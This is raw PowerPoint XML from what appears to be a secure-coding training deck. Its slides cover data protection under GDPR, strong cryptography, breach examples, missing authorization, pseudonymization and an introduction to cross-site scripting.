              <a:t>use constants </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>to prevent mistakes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>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Do not allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user input in format strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>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Careful with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>operator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3809436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0FC0-FA93-7B42-98D3-5F6E08D79DEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10585536" cy="1006475"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="53000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Securing Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF9E1B1F-BFAA-4247-AC86-F90A58FEAE7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1575103"/>
            <a:ext cx="10585537" cy="4857012"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="53000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The General Data Privacy Regulation (GDPR) has put additional emphasis on maintaining the security and privacy of data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data should be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>transmitted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> securely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cryptography is one critical way to achieve this mandate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secure protocols: TLS 1.2, TLS 1.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secure ciphers: ECDHE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strong digital signatures: SHA-2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reject invalid certificates and even more, enforce certificate pinning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strong authenticated symmetric encryption in transit and at rest: AES 256 GCM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Other ways:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anonymize private data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do not collect or send private data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Short data retention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure customer control over own data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231886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DATA BREACH!</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3629555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9757A-203F-9940-94A3-9B2E661663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80074"/>
            <a:ext cx="12192000" cy="529785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15027"/>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327606"/>
            <a:ext cx="12192000" cy="325925"/>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554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Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Top password stored with weak un-salted hash)</a:t>
            </a:r>
            <a:endPar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088954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F7C20-9697-7C45-A656-D74773A2B3CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="686234"/>
            <a:ext cx="12192000" cy="530820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287121"/>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068976"/>
            <a:ext cx="12192000" cy="325925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF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750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 and password transmitted in clear text via query parameters)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="695632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C96BC-0A95-D04F-9666-BCBA3B340B25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="283978"/>
            <a:ext cx="12192000" cy="608313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125427"/>
            <a:ext cx="12192000" cy="27902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219355"/>
            <a:ext cx="12192000" cy="28010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93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25674" y="423685"/>
            <a:ext cx="10515600" cy="549275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Missing/Incorrect Authorization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D721913-DCA6-2749-BF68-9D3623614B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61896" r="2089" b="6904"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5078373" y="1260748"/>
            <a:ext cx="718457" cy="926275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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2039671" y="1337889"/>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2039671" y="2143640"/>
            <a:ext cx="732893" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD39C724-D387-0645-AD03-15F0B8D33AA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006714" y="2187548"/>
            <a:ext cx="861775" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/admin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649" y="3688055"/>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914758" y="4640555"/>
            <a:ext cx="960391" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker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814967" y="3096905"/>
            <a:ext cx="1175083"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8" idx="2"/>
            <a:endCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2568179" y="1599985"/>
            <a:ext cx="750925" cy="1075049"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -30442"/>
              <a:gd name="adj2" fmla="val 67043"/>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6AD4CEB-26B0-0746-B537-EFE45C343400}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="5" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4083183" y="1531454"/>
            <a:ext cx="802757" cy="1187621"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -28477"/>
              <a:gd name="adj2" fmla="val 69559"/>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D7DDE3-48F9-A349-B146-4C9BC97FFCC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355334" y="2673673"/>
            <a:ext cx="1043619" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forceful </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CA95741-703D-094F-98A4-B6E2CE2F90A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443" t="2194" r="2456" b="66606"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3481167" y="1298909"/>
            <a:ext cx="718457" cy="926275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02E3FAB9-066A-034C-8859-182C5EC6ED6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3426169" y="2157311"/>
            <a:ext cx="929165" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/limited</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F5C7FC0-C3E0-314C-8A0C-90E558F21C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6277702" y="1260748"/>
            <a:ext cx="5247277" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0"/>
              <a:t>Missing or Incorrect Authorization occurs when the application does not properly validate roles and permissions allowing for elevation of privilege.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1214674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(Person details and credit card number saved in the clear to S3 bucket)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37556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91430"/>
            <a:ext cx="10931434" cy="4570376"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Avoid collecting data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>for individuals </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pseudonymize the data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Strong salted hashes can be used, replace key data with *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>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strong cryptographic algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>All</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>communication</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should be encrypted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data classification is risky so when in doubt, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>encrypt all data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2564887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solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="56000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect the Web UIs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C6ACF77-EC1C-A241-ADC3-A3B4E7180BFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="56000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Enterprise applications are using Web UIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>HTML is good looking, platform independent and powerful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>JavaScript libraries such as jQuery, React and Angular make UIs responsive and versatile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1818229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BCBE-3919-7F4A-81DF-742A15A65F1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="41000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89AEA192-99CA-554F-8186-27DF5B4614F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6281803" y="1825625"/>
            <a:ext cx="5071996" cy="4351338"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="28000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>The ability to inject arbitrary JavaScript into a web page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Reflected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Stored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>DOM based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Easy to introduce</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
